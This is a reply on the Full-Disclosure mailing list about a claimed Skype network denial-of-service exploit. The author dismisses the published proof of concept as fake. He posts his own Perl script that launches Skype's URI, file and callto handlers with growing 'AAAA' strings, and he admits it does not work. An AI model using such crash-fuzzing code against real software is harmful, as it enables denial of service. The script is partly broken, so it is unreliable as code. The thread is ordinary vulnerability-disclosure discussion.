Re: [Full-disclosure] Skype Network Remote DoS Exploit

[ascii <ascii@xxxxxxxxxxxx>]

Valery Marchuk wrote:
> Hi all!
> On SecurityLab.ru forum an exploit code was published by an anonymous
> user. Reportedly it must have caused Skype massive disconnections
> today. The PoC uses standard Skype client to call to a specific
> number. This call causes denial of service of current Skype server and
> forces Skype to reconnect to another server. The new server also
> "freezes" and so on ... the entire network.
> Liks: http://www.securitylab.ru/news/301422.php
> PoC: http://en.securitylab.ru/poc/301420.php

imho fake (the poc does nothing except looping forever, missing
execve(), exec() in place of system(), etc)

should be something like

#!/usr/bin/perl

for ($i=0;$i<(256*256);$i=$i+256) {
 // ctrl + q for fast quit from skype
 print "Try with $i\n";
 $eot='AAAA' x $i;
 $str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/uri:$eot\"";
 #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/file:$eot\"";
 #$str="\"/home/p/bin/skype_static-1.4.0.74/skype\" \"/callto:$eot\"";
 #$str="\"/home/l/bin/skype_static-latest/skype\" \"/uri:$eot\"";
 #$str="\"/usr/bin/skype\" \"/uri:$eot\"";
 #$str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
 #print($str);
 system($str);
}

uri is a legit skype protocol handler

0x2,"Classes\skype\shell\open\command", "", "%SystemDrive%\Program
Files\Skype\Phone\Skype.exe" "/uri:%1"
0x1,"Classes\Skype.Content\Shell\Open\Command", "",
"%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/file:%1"
0x2,"Classes\callto\shell\open\command", "",
"%SystemDrive%\Programs\Skype\Phone\Skype.exe" "/callto:%1"

but still doesn't work

Regards,
Francesco `ascii` Ongaro
http://www.ush.it/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/